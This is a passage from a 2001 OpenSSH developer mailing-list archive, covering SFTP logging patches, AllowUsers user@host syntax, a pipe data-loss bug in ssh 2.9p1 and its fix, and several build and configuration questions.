-1/-1) #1 x11 (t4 r3 i1/0 o32/0 fd 7/7) debug1: channel_free: channel 0: dettaching channel user debug1: channel 1: obuf empty debug1: channel 1: output drain -> closed debug1: channel 1: close_write debug1: channel 1: read<=0 rfd 7 len 0 debug1: channel 1: read failed debug1: channel 1: input open -> drain debug1: channel 1: close_read debug1: channel 1: input: no drain shortcut debug1: channel 1: ibuf empty debug1: channel 1: input drain -> closed debug1: channel 1: send eof debug1: channel 1: send close debug1: channel 1: rcvd close debug1: channel 1: is dead debug1: channel_free: channel 1: status: The following connections are open: #1 x11 (t4 r3 i8/0 o128/0 fd 7/7) From jason at dour.org Thu Jun 14 21:58:14 2001 From: jason at dour.org (Jason A . Dour) Date: Thu, 14 Jun 2001 07:58:14 -0400 Subject: SFTP Logging Message-ID: <20010614075814.A24420@dour.org> Hello everyone, Has there been any thought given to giving the SFTP subsystem better logging capabilities? We are looking to replace FTP, Telnet, and Rexec completely, but our FTP is presently logged and any replacement for it would also need to be logged. Specifically, we need to know about file uploads and downloads, deletions. et cetera. I've added some logging code to sftp-server.c, and would be happy to supply patches if it is of any interest at all. There obviously isn't much code to it, except for an extra function that parses pflags into a readable text string. Cheers, Jason # "Jason A. Dour" http://dour.org/ # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ From markus.friedl at informatik.uni-erlangen.de Thu Jun 14 23:03:11 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 14 Jun 2001 15:03:11 +0200 Subject: user@host in AllowUsers In-Reply-To: ; from pekkas@netcore.fi on Thu, Jun 14, 2001 at 12:16:46AM +0300 References: Message-ID: <20010614150311.A31511@folly> On Thu, Jun 14, 2001 at 12:16:46AM +0300, Pekka Savola wrote: > On Wed, 13 Jun 2001, Allan Stokes wrote: > > Andrew's patch would do the job just fine. I hope it gets incorporated, > > especially since the SSH book implies that this kind of access control is > > possible. > > This has been a feature of SSH.COM's sshd for a long time, and this is > what the book is probably referring to. > > Basically methods to control connecting hosts in sshd_config have been > removed from OpenSSH because most of these features are provided by > tcp_wrappers. we did never support AllowUser user at host if there is a patch that simplifies the current code it's likeley that it will be accepted. however, since the hang-on-exit bug is still not fixed. it's more important to fix the bugs than to add new features. From pekkas at netcore.fi Thu Jun 14 23:32:56 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Thu, 14 Jun 2001 16:32:56 +0300 (EEST) Subject: user@host in AllowUsers In-Reply-To: <20010614150311.A31511@folly> Message-ID: On Thu, 14 Jun 2001, Markus Friedl wrote: > On Thu, Jun 14, 2001 at 12:16:46AM +0300, Pekka Savola wrote: > > On Wed, 13 Jun 2001, Allan Stokes wrote: > > > Andrew's patch would do the job just fine. I hope it gets incorporated, > > > especially since the SSH book implies that this kind of access control is > > > possible. > > > > This has been a feature of SSH.COM's sshd for a long time, and this is > > what the book is probably referring to. > > > > Basically methods to control connecting hosts in sshd_config have been > > removed from OpenSSH because most of these features are provided by > > tcp_wrappers. > > we did never support > AllowUser user at host Sorry, I meant "support was removed when OpenSSH was created from Yl?nen's ssh-1.2.12". -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From allan at stokes.ca Fri Jun 15 00:42:54 2001 From: allan at stokes.ca (Allan Stokes) Date: Thu, 14 Jun 2001 07:42:54 -0700 Subject: user@host in AllowUsers Message-ID: > This has been a feature of SSH.COM's sshd for a long time, and this is > what the book is probably referring to. On page 6 the SSH book provides a secret decoder ring: SSH - generic term SSH-1 - the SSH protocol version 1 SSH-2 - the SSH protocol version 2 SSH1 - TY's ssh1 SSH2 - TY's ssh2 ssh - the client program (which is sometimes called ssh1 and ssh2) OpenSSH - OpenSSH from the OpenBSD project OpenSSH/1 - OpenSSH's behaviour wrt SSH-1 OpenSSH/2 - OpenSSH's behaviour wrt SSH-2 Section 5.5.2 gives examples of access control. I'll cite the examples attributed to OpenSSH which include wildcards, grouped by scope, ignoring examples which focus on Accept/Deny interaction. # SSH1, SSH2, OpenSSH AllowUsers ?mith AllowUsers s*@*.edu # page 179 # SSH1, OpenBSD AllowUsers smith jones cs* AllowGroups ?aculty s*s Hmm, not much meets the stated criteria. I'll also quote one small passage: <<< Finally, here is a useful configuration example, expressed in SSH1 syntax: AllowUsers walrus@* carpenter@* *@*.beach.net >>> We can cross out "probably referring" and replace it with "explicitly states". The SSH book explicitly documents that OpenSSH handles this syntax (erroneously for the time being) with a tip of the hat about the utility of this feature. Allan From abartlet at pcug.org.au Fri Jun 15 10:27:54 2001 From: abartlet at pcug.org.au (Andrew Bartlett) Date: Fri, 15 Jun 2001 10:27:54 +1000 Subject: SFTP Logging References: <20010614075814.A24420@dour.org> Message-ID: <3B29568A.9E2BC874@bartlett.house> "Jason A . Dour" wrote: > > Hello everyone, > > Has there been any thought given to giving the SFTP subsystem better > logging capabilities? We are looking to replace FTP, Telnet, and > Rexec completely, but our FTP is presently logged and any > replacement for it would also need to be logged. Specifically, we > need to know about file uploads and downloads, deletions. et cetera. > > I've added some logging code to sftp-server.c, and would be happy to > supply patches if it is of any interest at all. There obviously > isn't much code to it, except for an extra function that parses > pflags into a readable text string. > > Cheers, > Jason > # "Jason A. Dour" http://dour.org/ > # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ Remember that it will amout to moot unless you use a restricted shell, like the one I have posted to this list earlier, as otherwise users can just use their own SFTP server - without your logging capabilities. Andrew Bartlett -- Andrew Bartlett abartlet at pcug.org.au From jmknoble at jmknoble.cx Fri Jun 15 11:20:29 2001 From: jmknoble at jmknoble.cx (Jim Knoble) Date: Thu, 14 Jun 2001 20:20:29 -0500 Subject: SFTP Logging In-Reply-To: <3B29568A.9E2BC874@bartlett.house>; from abartlet@pcug.org.au on Fri, Jun 15, 2001 at 10:27:54AM +1000 References: <20010614075814.A24420@dour.org> <3B29568A.9E2BC874@bartlett.house> Message-ID: <20010614202029.B1274@zax.half.pint-stowp.cx> Circa 2001-Jun-15 10:27:54 +1000 dixit Andrew Bartlett: : "Jason A . Dour" wrote: : > Has there been any thought given to giving the SFTP subsystem better : > logging capabilities? : : Remember that it will amout to moot unless you use a restricted shell, : like the one I have posted to this list earlier, as otherwise users can : just use their own SFTP server - without your logging capabilities. Such as 'cat'. -- jim knoble | jmknoble at jmknoble.cx | http://www.jmknoble.cx/ (GnuPG fingerprint: 31C4:8AAC:F24E:A70C:4000::BBF4:289F:EAA8:1381:1491) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 249 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010614/27f91d2b/attachment.bin From jason at shalott.net Fri Jun 15 11:25:58 2001 From: jason at shalott.net (Jason Stone) Date: Thu, 14 Jun 2001 18:25:58 -0700 (PDT) Subject: SFTP Logging In-Reply-To: <3B29568A.9E2BC874@bartlett.house> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > > Has there been any thought given to giving the SFTP subsystem better > > logging capabilities? We are looking to replace FTP, Telnet, and > > Rexec completely, but our FTP is presently logged and any > > replacement for it would also need to be logged. Specifically, we > > need to know about file uploads and downloads, deletions. et cetera. > > Remember that it will amout to moot unless you use a restricted shell, > like the one I have posted to this list earlier, as otherwise users > can just use their own SFTP server - without your logging > capabilities. "Unless you're using keys." I'm always in favor of more logging options. -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE7KWQpswXMWWtptckRAkM+AJwJtKC59RmEen22VsRTaUaLPC1F9gCg4KOJ Rkz/36LwU6439GveFa8GQk4= =0Ugj -----END PGP SIGNATURE----- From anshul at raplix.com Fri Jun 15 12:51:26 2001 From: anshul at raplix.com (Anshul Jaiswal) Date: Thu, 14 Jun 2001 19:51:26 -0700 Subject: ssh hangs on remote command execution Message-ID: <6C251CBEC6AE574E8EAE7E80B1D3591526A342@mailserver.reactivity.com> Hi, I am using OpenSSH_2.5.2p2 on SunOS 5.8 [sparc] for remote command execution. A couple of times I see a bunch of hanging ssh clients even after the client that invoked ssh dies and the remote process dies. After doing some investigation I figured that the ssh client still had a socket open to the remote sshd process and both the processes were hung on poll(). I'd expect the sshd process to shut itself when it sees that the child process it spawned to execute the remote command is done. Is there something wrong with the way ssh is configured or the way I am using ssh? I use ssh to invoke commands on remote machines that in turn invoke commands on remote machines using ssh. Any help will be greatly appreciated! Thanks in advance, Anshul. From markus.friedl at informatik.uni-erlangen.de Fri Jun 15 21:20:41 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Fri, 15 Jun 2001 13:20:41 +0200 Subject: user@host in AllowUsers In-Reply-To: ; from allan@stokes.ca on Thu, Jun 14, 2001 at 07:42:54AM -0700 References: Message-ID: <20010615132041.B27642@folly> On Thu, Jun 14, 2001 at 07:42:54AM -0700, Allan Stokes wrote: > > > > This has been a feature of SSH.COM's sshd for a long time, and this is > > what the book is probably referring to. > > On page 6 the SSH book provides a secret decoder ring: yes, it looks like a bug in the book. tell the authors, but perhaps it's easier to add this in openssh-3.0 -m From jason at dour.org Sat Jun 16 00:37:49 2001 From: jason at dour.org (Jason A . Dour) Date: Fri, 15 Jun 2001 10:37:49 -0400 Subject: SFTP Logging In-Reply-To: <3B29568A.9E2BC874@bartlett.house>; from abartlet@pcug.org.au on Fri, Jun 15, 2001 at 10:27:54AM +1000 References: <3B29568A.9E2BC874@bartlett.house> <20010614075814.A24420@dour.org> <3B29568A.9E2BC874@bartlett.house> <20010614202029.B1274@zax.half.pint-stowp.cx> <20010614075814.A24420@dour.org> <3B29568A.9E2BC874@bartlett.house> Message-ID: <20010615103749.A25892@dour.org> On Fri, Jun 15, 2001 at 10:27:54AM +1000, Andrew Bartlett wrote: > Remember that it will amout to moot unless you use a restricted > shell, like the one I have posted to this list earlier, as > otherwise users can just use their own SFTP server - without your > logging capabilities. True. But I'm also coding such a shell to meet my needs for SFTP/SCP restricted users only. And I'm also spelunking the OpenSSH codebase to see about separating authentication and authorization. I don't know if authent/auhtoriz separation has been discussed before, but regardless of the authentication method I've allowed, I need to restrict what a user can do. I havne't come up with a clear solution yet, but I've a few ideas forming... On Thu, Jun 14, 2001 at 06:25:58PM -0700, Jason Stone wrote: > I'm always in favor of more logging options. I've attached a diff versus the 2.9p1 release (I apologize for my lack of CVS-ness). It covers logging of most major operations. The logline is constructed to include the parent PID, the UID of the user, and the UserName of the user for tracking/tie-back purposes: sftp-server[PID]: (PPID/UID/UNAME) Entry Possible cleanups...look at a better way to do sflags_from_portable. Presently the function that converts portable to "string flags" such as "(rwacte)" presently uses pointers to modify character values in a fixed-length string. I did it this way to avoid using any string.h functions that are not used throughout the program. Possible additions...look at logging a virtual current working directory via logging send_names. Not great since there really isn't a CWD with SFTP server, but it is a potential tidbit of information admins might want. Also potentially log uses of '..' in realpath as a paranoia check for admins who might want it. chroot() would be a better answer for this paranoia, but I presently do not have a chroot() solution. Feedback is appreciated. I apologize if I'm a bit unorthodox in my delivery of this contribution...it's been a while since I've been eye-deep in code (since the birth of suEXEC actually), and I'm a bit rusty. Cheers, Jason # "Jason A. Dour" http://dour.org/ # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ -------------- next part -------------- *** sftp-server.c.orig Mon Jun 11 12:18:31 2001 --- sftp-server.c Fri Jun 15 09:06:31 2001 *************** *** 52,59 **** /* Version of client */ int version; ! /* portable attibutes, etc. */ typedef struct Stat Stat; struct Stat { --- 52,65 ---- /* Version of client */ int version; ! /* User information. */ ! #define CUNAME cuname ? cuname : "UNKNOWN" ! struct passwd *upw; ! uid_t cuid; ! pid_t ppid; ! char *cuname; + /* portable attibutes, etc. */ typedef struct Stat Stat; struct Stat { *************** *** 115,120 **** --- 121,148 ---- return flags; } + void + sflags_from_portable(char *psflags, int pflags) + { + if (pflags & SSH2_FXF_READ) + *psflags = 'r'; + psflags++; + if (pflags & SSH2_FXF_WRITE) + *psflags = 'w'; + psflags++; + if (pflags & SSH2_FXF_APPEND) + *psflags = 'a'; + psflags++; + if (pflags & SSH2_FXF_CREAT) + *psflags = 'c'; + psflags++; + if (pflags & SSH2_FXF_TRUNC) + *psflags = 't'; + psflags++; + if (pflags & SSH2_FXF_EXCL) + *psflags = 'e'; + } + Attrib * get_attrib(void) { *************** *** 370,375 **** --- 398,404 ---- version = buffer_get_int(&iqueue); TRACE("client version %d", version); + log("(%d/%d/%s) Client version %d", ppid, cuid, CUNAME, version); buffer_init(&msg); buffer_put_char(&msg, SSH2_FXP_VERSION); buffer_put_int(&msg, SSH2_FILEXFER_VERSION); *************** *** 382,388 **** { u_int32_t id, pflags; Attrib *a; ! char *name; int handle, fd, flags, mode, status = SSH2_FX_FAILURE; id = get_int(); --- 411,417 ---- { u_int32_t id, pflags; Attrib *a; ! char *name, sflags[7] = "------"; int handle, fd, flags, mode, status = SSH2_FX_FAILURE; id = get_int(); *************** *** 390,397 **** --- 419,428 ---- pflags = get_int(); /* portable flags */ a = get_attrib(); flags = flags_from_portable(pflags); + sflags_from_portable(&sflags[0], pflags); mode = (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) ? a->perm : 0666; TRACE("open id %d name %s flags %d mode 0%o", id, name, pflags, mode); + log("(%d/%d/%s) File/Dir opened: %s (%s,%04o)", ppid, cuid, CUNAME, name, sflags, mode); fd = open(name, flags, mode); if (fd < 0) { status = errno_to_portable(errno); *************** *** 589,594 **** --- 620,626 ---- name = get_string(NULL); a = get_attrib(); TRACE("setstat id %d name %s", id, name); + log("(%d/%d/%s) Permissions altered: %s (%04o).", ppid, cuid, CUNAME, name, a->perm & 0777); if (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) { ret = chmod(name, a->perm & 0777); if (ret == -1) *************** *** 623,628 **** --- 655,661 ---- TRACE("fsetstat id %d handle %d", id, handle); fd = handle_to_fd(handle); name = handle_to_name(handle); + log("(%d/%d/%s) Permissions altered: %s (%04o).", ppid, cuid, CUNAME, name, a->perm & 0777); if (fd < 0 || name == NULL) { status = SSH2_FX_FAILURE; } else { *************** *** 790,795 **** --- 823,829 ---- id = get_int(); name = get_string(NULL); TRACE("remove id %d name %s", id, name); + log("(%d/%d/%s) File deleted: %s", ppid, cuid, CUNAME, name); ret = unlink(name); status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; send_status(id, status); *************** *** 810,815 **** --- 844,850 ---- mode = (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) ? a->perm & 0777 : 0777; TRACE("mkdir id %d name %s mode 0%o", id, name, mode); + log("(%d/%d/%s) Directory created: %s", ppid, cuid, CUNAME, name); ret = mkdir(name, mode); status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; send_status(id, status); *************** *** 826,831 **** --- 861,867 ---- id = get_int(); name = get_string(NULL); TRACE("rmdir id %d name %s", id, name); + log("(%d/%d/%s) Directory deleted: %s", ppid, cuid, CUNAME, name); ret = rmdir(name); status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; send_status(id, status); *************** *** 869,874 **** --- 905,911 ---- oldpath = get_string(NULL); newpath = get_string(NULL); TRACE("rename id %d old %s new %s", id, oldpath, newpath); + log("(%d/%d/%s) File/Dir renamed: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); /* fail if 'newpath' exists */ if (stat(newpath, &st) == -1) { ret = rename(oldpath, newpath); *************** *** 914,919 **** --- 951,957 ---- oldpath = get_string(NULL); newpath = get_string(NULL); TRACE("symlink id %d old %s new %s", id, oldpath, newpath); + log("(%d/%d/%s) Symbolic link created: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); /* fail if 'newpath' exists */ if (stat(newpath, &st) == -1) { ret = symlink(oldpath, newpath); *************** *** 951,956 **** --- 989,995 ---- msg_len = GET_32BIT(cp); if (msg_len > 256 * 1024) { error("bad message "); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Bad Message"); exit(11); } if (buffer_len(&iqueue) < msg_len + 4) *************** *** 1031,1045 **** --- 1070,1102 ---- int in, out, max; ssize_t len, olen, set_size; + /* XXX should use getopt */ __progname = get_progname(av[0]); handle_init(); + /* Initialize the username of the user running the process. */ + cuid = getuid(); + if ((upw = getpwuid(cuid)) == NULL) { + cuname = NULL; + } else { + cuname = upw->pw_name; + } + + /* Initialize the parent process ID. */ + ppid = getppid(); + + /* Initialize the logfile, loglevel dependent on DEBUG compile-time setting. */ #ifdef DEBUG_SFTP_SERVER log_init("sftp-server", SYSLOG_LEVEL_DEBUG1, SYSLOG_FACILITY_AUTH, 0); + #else + log_init("sftp-server", SYSLOG_LEVEL_INFO, SYSLOG_FACILITY_AUTH, 0); #endif + /* Log session start. */ + log("(%d/%d/%s) SFTP session started.", ppid, cuid, CUNAME); + in = dup(STDIN_FILENO); out = dup(STDOUT_FILENO); *************** *** 1073,1078 **** --- 1130,1136 ---- if (select(max+1, rset, wset, NULL, NULL) < 0) { if (errno == EINTR) continue; + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Select Error"); exit(2); } *************** *** 1082,1090 **** --- 1140,1150 ---- len = read(in, buf, sizeof buf); if (len == 0) { debug("read eof"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "EOF"); exit(0); } else if (len < 0) { error("read error"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Read Error"); exit(1); } else { buffer_append(&iqueue, buf, len); *************** *** 1095,1100 **** --- 1155,1161 ---- len = write(out, buffer_ptr(&oqueue), olen); if (len < 0) { error("write error"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Write Error"); exit(1); } else { buffer_consume(&oqueue, len); From mouring at etoh.eviladmin.org Sat Jun 16 03:21:51 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Fri, 15 Jun 2001 12:21:51 -0500 (CDT) Subject: question about Ultrix system In-Reply-To: <7373531239.20010615181151@dezcom.org> Message-ID: If you can describe the problem someone on the OpenSSH Development list may be able to help you through it. - Ben On Fri, 15 Jun 2001, Ilya Kallistratov wrote: > Hello! > I have such trouble - I can't use OpenSSH under system ULTRIX V4.3/UWS > V4.3 (Rev. 44). Could you tell me please, would OpenSSH be available > on it? > Sorry for disturbing you. > > > -- > Best regards, > Ilya Kallistratov > mailto:ilya at dezcom.org > > From pspencer at fields.utoronto.ca Sat Jun 16 04:19:44 2001 From: pspencer at fields.utoronto.ca (Philip Spencer) Date: Fri, 15 Jun 2001 14:19:44 -0400 (EDT) Subject: openssh 2.9p1: data loss when stdout sent to a pipe Message-ID: We recently tried upgrading openssh from 2.5.2p2 to 2.9p1 and discovered that it no longer worked to feed the output from a remote command into a pipe, unless the output was short and the pipe was very fast at processing its input. Example 1: ssh remote_machine some_command | less (where "some_command" generates a lot of output) now fails after the first screenful, with a "Write failed flushing stdout buffer" message. Example 2: ssh remote_machine 'yes | head -2000' | (sleep 3 ; wc -l) With openssh 2.5.2p2 this correctly returns "2000". With 2.9p1 we get Write failed flushing stdout buffer. 1024 This is on both Linux (RedHat 7.0) and Irix (6.5.11). Investigation reveals that this problem was caused by the addition of lines into clientloop.c that force non-blocking mode onto the stdout channel. Applying the following patch (to revert that portion of clientloop.c to its state as of openssh2.5.2p2) fixes the problem: --- openssh-2.9p1/clientloop.c.losesdata Fri Apr 20 08:50:51 2001 +++ openssh-2.9p1/clientloop.c Fri Jun 15 14:13:32 2001 @@ -787,12 +787,15 @@ if (!compat20) { /* enable nonblocking unless tty */ + /* REMOVED for now since it prevents ssh command output from + being reliably sent to a pipe. - PHS 2001/06/15 if (!isatty(fileno(stdin))) set_nonblock(fileno(stdin)); if (!isatty(fileno(stdout))) set_nonblock(fileno(stdout)); if (!isatty(fileno(stderr))) set_nonblock(fileno(stderr)); + */ max_fd = MAX(max_fd, fileno(stdin)); max_fd = MAX(max_fd, fileno(stdout)); max_fd = MAX(max_fd, fileno(stderr)); Now, presumably those lines were added to the source code to address some other problem (perhaps one of the hanging problems I see mentioned on the list?) So simply removing them as per my patch above, while it works fine on our site, probably isn't the optimal solution. But leaving them in isn't a solution either, since it broke several of our scripts that fed ssh output into a pipe for processing! --------------------------------------------+------------------------------- Philip Spencer pspencer at fields.utoronto.ca | Director of Computing Services Room 336 (416)-348-9710 ext3036 | The Fields Institute for 222 College St, Toronto ON M5T 3J1 Canada | Research in Mathematical Sciences From pspencer at fields.utoronto.ca Sat Jun 16 04:48:02 2001 From: pspencer at fields.utoronto.ca (Philip Spencer) Date: Fri, 15 Jun 2001 14:48:02 -0400 (EDT) Subject: ssh & pipe In-Reply-To: <200106151841.LAA01182@c572157-a.sttln1.wa.home.com> Message-ID: Sorry, I forgot to include the -n flag in my examples. Previous pipe problems in openssh were indeed cured by adding -n as you suggest, but this current problem is occurring even with the -n option. Thanks for the reminder, though. The -n was in the original script that was failing, but I forgot it when generating the test-case examples. But alas, even with the -n the test-case examples still fail. :( - Philip. On Fri, 15 Jun 2001, John Dunlap wrote: > > We recently tried upgrading openssh from 2.5.2p2 to 2.9p1 > > and discovered that it no longer worked to feed the output from a remote > > command into a pipe, unless the output was short and the pipe was very > > fast at processing its input. > > > Example 1: ssh remote_machine some_command | less > > I cured this by adding -n to the ssh options: > > ssh -n remote_machine some_command | less > > -- > John Dunlap University of Washington > Senior Electrical Engineer Applied Physics Laboratory > dunlap at apl.washington.edu 1013 NE 40th Street > 206-543-7207, 543-1300, FAX 543-6785 Seattle, WA 98105-6698 > --------------------------------------------+------------------------------- Philip Spencer pspencer at fields.utoronto.ca | Director of Computing Services Room 336 (416)-348-9710 ext3036 | The Fields Institute for 222 College St, Toronto ON M5T 3J1 Canada | Research in Mathematical Sciences From Markus.Friedl at informatik.uni-erlangen.de Sat Jun 16 06:14:41 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Fri, 15 Jun 2001 22:14:41 +0200 Subject: ssh & pipe In-Reply-To: ; from pspencer@fields.utoronto.ca on Fri, Jun 15, 2001 at 02:48:02PM -0400 References: <200106151841.LAA01182@c572157-a.sttln1.wa.home.com> Message-ID: <20010615221441.A23687@faui02.informatik.uni-erlangen.de> do you have a ssh -v -v -v output for your test case? -m On Fri, Jun 15, 2001 at 02:48:02PM -0400, Philip Spencer wrote: > Sorry, I forgot to include the -n flag in my examples. > > Previous pipe problems in openssh were indeed cured by adding -n as > you suggest, but this current problem is occurring even with the -n option. > > Thanks for the reminder, though. The -n was in the original script that > was failing, but I forgot it when generating the test-case examples. > > But alas, even with the -n the test-case examples still fail. :( > > - Philip. > > On Fri, 15 Jun 2001, John Dunlap wrote: > > > > We recently tried upgrading openssh from 2.5.2p2 to 2.9p1 > > > and discovered that it no longer worked to feed the output from a remote > > > command into a pipe, unless the output was short and the pipe was very > > > fast at processing its input. > > > > > Example 1: ssh remote_machine some_command | less > > > > I cured this by adding -n to the ssh options: > > > > ssh -n remote_machine some_command | less > > > > -- > > John Dunlap University of Washington > > Senior Electrical Engineer Applied Physics Laboratory > > dunlap at apl.washington.edu 1013 NE 40th Street > > 206-543-7207, 543-1300, FAX 543-6785 Seattle, WA 98105-6698 > > > > --------------------------------------------+------------------------------- > Philip Spencer pspencer at fields.utoronto.ca | Director of Computing Services > Room 336 (416)-348-9710 ext3036 | The Fields Institute for > 222 College St, Toronto ON M5T 3J1 Canada | Research in Mathematical Sciences > From Markus.Friedl at informatik.uni-erlangen.de Sat Jun 16 06:17:19 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Fri, 15 Jun 2001 22:17:19 +0200 Subject: openssh 2.9p1: data loss when stdout sent to a pipe In-Reply-To: ; from pspencer@fields.utoronto.ca on Fri, Jun 15, 2001 at 02:19:44PM -0400 References: Message-ID: <20010615221719.B23687@faui02.informatik.uni-erlangen.de> On Fri, Jun 15, 2001 at 02:19:44PM -0400, Philip Spencer wrote: > --- openssh-2.9p1/clientloop.c.losesdata Fri Apr 20 08:50:51 2001 > +++ openssh-2.9p1/clientloop.c Fri Jun 15 14:13:32 2001 > @@ -787,12 +787,15 @@ > > if (!compat20) { > /* enable nonblocking unless tty */ > + /* REMOVED for now since it prevents ssh command output from > + being reliably sent to a pipe. - PHS 2001/06/15 > if (!isatty(fileno(stdin))) > set_nonblock(fileno(stdin)); > if (!isatty(fileno(stdout))) > set_nonblock(fileno(stdout)); > if (!isatty(fileno(stderr))) > set_nonblock(fileno(stderr)); > + */ > max_fd = MAX(max_fd, fileno(stdin)); > max_fd = MAX(max_fd, fileno(stdout)); > max_fd = MAX(max_fd, fileno(stderr)); > > Now, presumably those lines were added to the source code to address some > other problem (perhaps one of the hanging problems I see mentioned on the > list?) So simply removing them as per my patch above, while it works fine > on our site, probably isn't the optimal solution. we now do this (in -current): /* restore blocking io */ if (!isatty(fileno(stdin))) unset_nonblock(fileno(stdin)); if (!isatty(fileno(stdout))) unset_nonblock(fileno(stdout)); if (!isatty(fileno(stderr))) unset_nonblock(fileno(stderr)); before flushing stdout/stderr. -m From carson at taltos.org Sat Jun 16 06:56:05 2001 From: carson at taltos.org (Carson Gaspar) Date: Fri, 15 Jun 2001 13:56:05 -0700 Subject: openssh 2.9p1: data loss when stdout sent to a pipe In-Reply-To: Message-ID: <475920254.992613365@ZATHROS> We're seeing the same thing here. Sadly, the flush code is... ummm... differently written. It assumes _any_ return from write <= 0 is an unrecoverable error and bombs. It doesn't check for EAGAIN or EINTR, much less EWOULDBLOCK. -- Carson Gaspar - carson at taltos.org Queen trapped in a butch body From stevev at darkwing.uoregon.edu Sat Jun 16 07:49:44 2001 From: stevev at darkwing.uoregon.edu (Steve VanDevender) Date: Fri, 15 Jun 2001 14:49:44 -0700 Subject: no // comments, please Message-ID: <15146.33528.118362.897059@darkwing.uoregon.edu> Non-gcc compilers tend not to like C++-style // comments in plain C code, as I discovered when trying to build the latest snapshot (20010615) with the Tru64 UNIX C compiler. *** channels.h.orig Fri Jun 8 18:20:07 2001 --- channels.h Fri Jun 15 14:41:01 2001 *************** *** 209,215 **** /* x11 forwarding */ int x11_connect_display(void); ! //int x11_check_cookie(Buffer *b); char *x11_create_display(int screen); char *x11_create_display_inet(int screen, int x11_display_offset); void x11_input_open(int type, int plen, void *ctxt); --- 209,215 ---- /* x11 forwarding */ int x11_connect_display(void); ! /*int x11_check_cookie(Buffer *b);*/ char *x11_create_display(int screen); char *x11_create_display_inet(int screen, int x11_display_offset); void x11_input_open(int type, int plen, void *ctxt); I can also vouch for the problems with building OpenSSH under more recent Tru64 UNIX versions (I have 4.0G) where -D_SOCKADDR_LEN is necessary to get the right sockaddr structure defined in sys/socket.h. What's particularly annoying about this problem is that if you don't build with -D_SOCKADDR_LEN, the compilation finishes successfully and you get the rather non-obvious error message "Secure connection to foo refused" from the ssh binary produced. From carson at taltos.org Sat Jun 16 08:19:16 2001 From: carson at taltos.org (Carson Gaspar) Date: Fri, 15 Jun 2001 15:19:16 -0700 Subject: Patch for stdout/stderr buffer flush write() handling Message-ID: <480910633.992618356@ZATHROS> The attached patch against today's CVS improves write() error handling and logging in clientloop.c when flushing stdout/stderr. -- Carson Gaspar - carson at taltos.org Queen trapped in a butch body -------------- next part -------------- A non-text attachment was scrubbed... Name: clientloop.c.diff Type: application/octet-stream Size: 966 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010615/58f3dafb/attachment.obj From crist.clark at globalstar.com Sat Jun 16 08:20:03 2001 From: crist.clark at globalstar.com (Crist Clark) Date: Fri, 15 Jun 2001 15:20:03 -0700 Subject: Default Path in sshd_config Message-ID: <3B2A8A13.67050307@globalstar.com> I was just building binary Solaris packages of OpenSSH for use at our company. While doing so, it occurred to me that the only thing that really stops me from being able to make a binary build totally relocatable in the filesystem tree is the default path. Other than that, I cannot think of any file path that cannot be modified with either a command line option or in a configuration file. Is there a reason that, for example, DefaultPath /opt/openssh/bin Could not be something put into the sshd_config file? Or does this exist in the code, but not (or I missed it) in the documentation? (Oh, and I still need to hack around with the manpages by hand to get them to work in Solaris, but I think that is a known issue?) -- Crist J. Clark Network Security Engineer crist.clark at globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster at globalstar.com From carson at taltos.org Sat Jun 16 08:20:40 2001 From: carson at taltos.org (Carson Gaspar) Date: Fri, 15 Jun 2001 15:20:40 -0700 Subject: EOL problem with channels.h in CVS Message-ID: <480995445.992618440@ZATHROS> channels.h from today's CVS has MS-DOS ^M end-of-line chars. -- Carson Gaspar - carson at taltos.org Queen trapped in a butch body From pspencer at fields.utoronto.ca Sat Jun 16 08:22:27 2001 From: pspencer at fields.utoronto.ca (Philip Spencer) Date: Fri, 15 Jun 2001 18:22:27 -0400 (EDT) Subject: ssh & pipe In-Reply-To: <20010615221441.A23687@faui02.informatik.uni-erlangen.de> Message-ID: On Fri, 15 Jun 2001, Markus Friedl wrote: > do you have a ssh -v -v -v output for your test case? Yes; attached is the output from running ./ssh -1 -n -x -v -v -v fields 'yes |head -2000' | ( sleep 3 ; wc -l ) However, the additions you mentioned from the OpenBSD current CVS do fix the problem (without having to remove the set_nonblock lines); thanks! - Philip. --------------------------------- % ./ssh -1 -n 